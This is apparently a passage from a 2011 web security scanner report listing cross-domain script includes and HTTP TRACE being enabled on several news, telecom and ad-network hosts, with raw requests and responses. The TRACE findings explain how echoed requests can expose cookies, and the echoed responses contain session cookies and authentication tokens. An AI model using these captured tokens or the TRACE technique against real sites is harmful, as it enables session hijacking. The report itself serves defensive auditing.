http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /sitemap.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:19 GMT
Connection: close
Content-Length: 108984

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

19.37. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.echoenabled.com/clientapps/v2/jquery-plugins.js
http://cdn.echoenabled.com/clientapps/v2/stream.js
http://jlinks.industrybrains.com/jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp
http://platform.linkedin.com/in.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js
https://apis.google.com/js/plusone.js

Request

GET /article/2011/09/04/us-weather-football-idUSTRE78222D20110904 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:46 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:45:26 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:22:35 GMT
CHANNEL-NAME: domesticNews
Last-UpdatedA: Sun, 04 Sep 2011 00:22:35 GMT
Host: www.reuters.com
Age: 139
Vary: Accept-Encoding
Content-Length: 91160
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:45:27 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<li class="linkedIn " tns="no">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</span>
<script src="http://cdn.echoenabled.com/clientapps/v2/jquery-plugins.js"></script>
<script src="http://cdn.echoenabled.com/clientapps/v2/stream.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
{"parsetags": "explicit"}
</script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

19.38. http://www.reuters.com/assets/commentsChild previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

19.39. http://www.reuters.com/assets/newsFlash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The response dynamically includes the following script from another domain:

http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

19.40. http://www.sacbee.com/notfound/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/notfound/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320
http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300
http://init.lingospot.com/ls.js?key=3_Sacbee

Request

GET /notfound/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Proxy-Connection: Keep-Alive
Host: www.sacbee.com

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 56279
Expires: Sun, 04 Sep 2011 00:58:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">

<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

19.41. http://www.scribd.com/embeds/63688924/content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scribd.com
Path:	/embeds/63688924/content

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997

Request

Response

19.42. http://www.scribd.com/embeds/63688924/content_inner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scribd.com
Path:	/embeds/63688924/content_inner

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://fonts4.scribdassets.com/static/4gen.js?1314662118
http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997

Request

Response

19.43. http://www.sprint.com/index_c.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/index_c.html

Issue detail

The response dynamically includes the following script from another domain:

https://sprintproactive.ehosts.net/netagent/proactive/proactive.aspx

Request

Response

19.44. https://www.sprint.net/performance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

19.45. http://www.und.com/sports/m-footbl/9873956 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://graphics.fansonly.com/scripts/flash-embed2.js
http://grfx.cstv.com/flash/video/flv_player.js
http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js
http://grfx.cstv.com/scripts/common.js
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /sports/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:40 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

19.46. http://www.und.com/sports/m-footbl/9874134 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://graphics.fansonly.com/scripts/flash-embed2.js
http://grfx.cstv.com/flash/video/flv_player.js
http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js
http://grfx.cstv.com/scripts/common.js
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /sports/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:45 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

19.47. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wisdomtree.com
Path:	/bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /bannerads/dyneld2010fall/dyneld2010falllp.html HTTP/1.1
Host: www.wisdomtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 28427
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:22:29 GMT
Accept-Ranges: bytes
ETag: "ccb960fc95d7cb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:03 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.48. http://www.youtube.com/embed/xXftjfC3b5o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/xXftjfC3b5o

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js

Request

Response

20. TRACE method is enabled previous next
There are 15 instances of this issue:

http://bh.contextweb.com/
http://blogs.sacbee.com/
http://community.sprint.com/
http://image2.pubmatic.com/
http://imp.fetchback.com/
http://log.c12s.com/
http://m.xp1.ru4.com/
http://mi.adinterax.com/
http://optimized-by.rubiconproject.com/
http://r.openx.net/
http://rt.legolas-media.com/
http://sales.reuters.com/
http://tacoda.at.atwola.com/
http://www.sprint.com/
https://www.sprint.net/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: f241348312199b3

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 255
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: f241348312199b3; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2; pb_rtb_ev="1:535461.2925993182975414771.0"
connection: Keep-Alive
cw-userhostaddress: 50.23.123.106

20.2. http://blogs.sacbee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.sacbee.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blogs.sacbee.com
Cookie: 64ddfb1320eb069f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.sacbee.com
Cookie: 64ddfb1320eb069f; sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=131744520036
...[SNIP]...

20.3. http://community.sprint.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/

Request

TRACE / HTTP/1.0
Host: community.sprint.com
Cookie: 3ccfac9e56fc122

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: community.sprint.com
Cookie: 3ccfac9e56fc122; JSESSIONID=0D696C3D1AE0B0035F1215A93D5B6A03.LB5; jive.server.info="serverName=community.sprint.com:serverPort=80:contextPath=/baw:localName=localhost:localPort=9001:localAddr=127.0.0.1"; jive.recentH
...[SNIP]...

20.4. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: f626da1c15f00e8

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:34 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: f626da1c15f00e8; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283

20.5. http://imp.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 59dda222265aa6fc

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 59dda222265aa6fc; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:6
...[SNIP]...

20.6. http://log.c12s.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://log.c12s.com
Path:	/

Request

TRACE / HTTP/1.0
Host: log.c12s.com
Cookie: e936cd229a56da57

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 04 Sep 2011 00:47:48 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 204
Connection: Close

TRACE / HTTP/1.1
host: log.c12s.com
Cookie: e936cd229a56da57; aid=10.87.42.144.1315097001140001
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

20.7. http://m.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: b8188b70cdea3a7e

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: b8188b70cdea3a7e; X1ID=BO-00000000670935830; O62795=0
Connection: Keep-Alive
X-xp1-forwarded-for: 50.23.123.106

20.8. http://mi.adinterax.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mi.adinterax.com
Path:	/

Request

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: faa5250c95d89ec6

Response

HTTP/1.1 200 OK
Server: Footprint 4.8/FPMCP
Mime-Version: 1.0
Date: Sun, 04 Sep 2011 00:59:10 GMT
Content-Type: message/http
Content-Length: 150
Expires: Sun, 04 Sep 2011 00:59:10 GMT
Connection: close

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: faa5250c95d89ec6; adxid=01345f4e62cacd40; adxf=696749@1@221
_FP_X_URL: http://mi.adinterax.com/

